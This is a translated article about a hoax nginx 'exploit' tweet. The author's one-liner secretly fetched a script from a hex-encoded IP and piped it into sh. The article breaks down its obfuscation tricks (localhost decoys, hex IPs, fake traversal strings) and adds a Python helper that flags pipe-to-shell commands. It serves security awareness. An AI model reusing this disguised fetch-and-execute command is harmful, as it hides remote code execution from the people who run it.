The success of a social experiment with a fake nginx exploit

Translator's note: the author of the original article, published on June 1, decided to run an experiment among people interested in information security. To do so, he prepared a fake exploit for an undisclosed vulnerability in the web server and posted it on his Twitter. His expectation that experts would instantly see through the obvious hoax in the code was not just unmet... it was exceeded in the opposite direction: the tweet got enormous support from many people who never bothered to check its contents.


TL;DR: Do not pipe a file into sh or bash under any circumstances. This is a great way to lose control of your computer.

I want to share a short story about a joke PoC exploit created on May 31. It appeared immediately in response to news from Alisa Esage Shevchenko, a member of the Zero Day Initiative (ZDI), that information about a vulnerability in NGINX leading to RCE (remote code execution) would soon be disclosed. Since NGINX powers a huge number of websites, the news should have been a bombshell. But because of delays in the "responsible disclosure" process, the details of what had happened were unknown; this is standard ZDI procedure.

[Image] Tweet about the disclosure of the NGINX vulnerability

Having just finished working on a new obfuscation technique for curl, I quoted the original tweet and "leaked a working PoC" consisting of a single line of code that supposedly exploited the discovered vulnerability. Of course, it was complete nonsense. I assumed I would be called out right away and would at best get a couple of retweets (oh well).

[Image] Tweet with the hoax

However, I could not have imagined what happened next. The popularity of my tweet skyrocketed. Surprisingly, at the moment (15:00 Moscow time on June 1) few people have noticed that it is a hoax. Many are retweeting it without checking at all (not to mention admiring the pretty ASCII art it produces).

[Image] Just look how beautiful it is!

While all these loops and colours are lovely, it is obvious that people had to run the code on their own machine to see them. Fortunately, browsers behave the same way, and combined with the fact that I did not want to get into legal trouble, the code buried on my site only made echo calls without attempting to install or execute any additional code.

A small digression: netspooky, dnz, myself and other folks from the Thugcrowd team have been playing with various ways of obfuscating curl commands for a while now, because it is cool... and we are geeks. netspooky and dnz discovered several new methods that looked very promising to me. I joined in the fun and tried adding decimal IP conversions to the bag of tricks. It turns out that an IP can also be converted to hexadecimal format. Moreover, curl and most other NIX tools happily consume hexadecimal IPs! So it was just a matter of crafting a convincing and safe-looking command line. In the end I came up with this:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE): more than just phishing

Safety and familiarity were a big part of this experiment. I think they are what led to its success. The command line clearly signals safety by referring to "127.0.0.1" (the well-known localhost). Localhost is considered safe, and data sent to it never leaves your computer.

Familiarity was the second key SEE component of the experiment. Since the target audience consisted mainly of people familiar with the basics of computer security, it was important to craft the code so that its parts looked familiar and ordinary (and therefore safe). Borrowing elements of old exploit concepts and combining them in an unusual way proved very successful.

Below is a detailed breakdown of the one-liner. Everything in this list is purely cosmetic, and none of it is needed for the line to actually work.

Which components are actually needed? These are -gsS, -O 0x0238f06a, |sh and the web server itself. The web server contained no malicious instructions; it simply served the ASCII art using echo commands in a script contained in index.html. When the user entered the line with |sh in the middle, index.html was downloaded and executed. Fortunately, the web server's maintainers had no malicious intent.

  • ../../../%00 - stands for escaping the directory (directory traversal);
  • ngx_stream_module.so - the path to a random NGINX module;
  • /bin/sh%00<'protocol:TCP' - supposedly we launch /bin/sh on the target machine and redirect its output to a TCP channel;
  • -O 0x0238f06a#PLToffset - the secret ingredient, spiced up with #PLToffset to look like some kind of memory offset inside the PLT;
  • |sh; - another essential piece. We needed to redirect the output to sh/bash in order to execute the code served by the attacking web server located at 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - a dummy in which netcat points at /dev/tcp/localhost so that everything looks safe once again. In reality it does nothing and was added to the line for beauty.
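As an added example (not part of the original article), a small triage helper in Python that does what the readers who retweeted the one-liner should have done: decode the IPv4 literal spellings curl accepts (dotted, decimal, 0x-hex) back to dotted-quad, and flag any command that pipes fetched content into a shell. The hex literal is the one from the page; the host-parsing logic and function names are this example's own.

```python
import re
import shlex
from typing import Optional

# The hoax one-liner exactly as quoted on this page (a joke, not a working exploit).
HOAX_CMD = ("curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler"
            "?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00"
            "<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost")

# Matches "|sh", "| bash" and similar: the part that actually hands control to the server.
PIPE_TO_SHELL = re.compile(r'\|\s*(?:sh|bash|dash|zsh|ksh)\b')


def ip_literal_to_dotted(literal: str) -> Optional[str]:
    """Normalise the IPv4 spellings curl accepts (dotted, decimal, 0x-hex) to a.b.c.d."""
    if re.fullmatch(r'\d{1,3}(?:\.\d{1,3}){3}', literal):
        octets = [int(o) for o in literal.split('.')]
    else:
        try:
            value = int(literal, 0)   # base 0: '0x..' hex, '0o..' octal, plain decimal
        except ValueError:
            return None               # hostnames, flags and other tokens land here
        if not 0 <= value <= 0xFFFFFFFF:
            return None
        octets = [(value >> shift) & 0xFF for shift in (24, 16, 8, 0)]
    if any(o > 255 for o in octets):
        return None
    return '.'.join(str(o) for o in octets)


def host_of(token: str) -> str:
    """Strip scheme, userinfo, port, path, query and fragment from a URL-like token."""
    token = re.sub(r'^[a-z][a-z0-9+.-]*://', '', token, flags=re.I)
    authority = re.split(r'[/?#<>]', token, 1)[0]   # '#PLToffset' is a fragment, dropped
    authority = authority.rsplit('@', 1)[-1]
    return authority.split(':', 1)[0]


def analyze_one_liner(cmd: str) -> dict:
    """Report whether a command pipes fetched content into a shell and which hosts it decodes to."""
    hosts = []
    for tok in shlex.split(cmd):
        decoded = ip_literal_to_dotted(host_of(tok))
        if decoded and decoded not in hosts:
            hosts.append(decoded)
    return {'pipes_to_shell': bool(PIPE_TO_SHELL.search(cmd)), 'hosts': hosts}


if __name__ == '__main__':
    print(analyze_one_liner(HOAX_CMD))
```

Run on the page's one-liner, the report shows the only resolvable fetch target is the hex address and that its output is piped to sh; the 127.0.0.1 decoy never resolves to anything.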

This concludes the breakdown of the one-liner and the discussion of "socio-electronic engineering" (elaborate phishing).

Web server configuration and countermeasures

Since most of my followers are infosec people / hackers, I decided to make the web server a bit more resistant to the "interest" on their part, so the guys had something to do (and it would be fun to set up). I will not list all the traps here since the experiment is still ongoing, but here are a few things the server does:

  • Actively monitors attempts to share it on certain social networks and substitutes different preview thumbnails to encourage the user to click the link.
  • Redirects Chrome/Mozilla/Safari/etc. to a Thugcrowd promo video instead of showing the shell script.
  • Watches for OBVIOUS signs of intrusion/blatant hacking attempts, and then starts redirecting requests to NSA servers (ha!).
  • Installs a Trojan, along with a BIOS rootkit, on every computer of users who visit the host from a regular browser (just kidding!).

[Image] A small part of the countermeasures

In this case, my only goal was to learn some of Apache's features, in particular its cool request-rewriting rules, and I thought: why not?

The NGINX exploit (a real one!)

Subscribe to @alisaesage on Twitter and follow ZDI's great work in addressing real vulnerabilities and exploits in NGINX. Their work has always fascinated me, and I am grateful to Alisa for her patience with all the mentions and notifications caused by my tweet. Fortunately, it did some good: it helped raise awareness of the NGINX vulnerability, as well as of the problems caused by misuse of curl.

source: www.habr.com
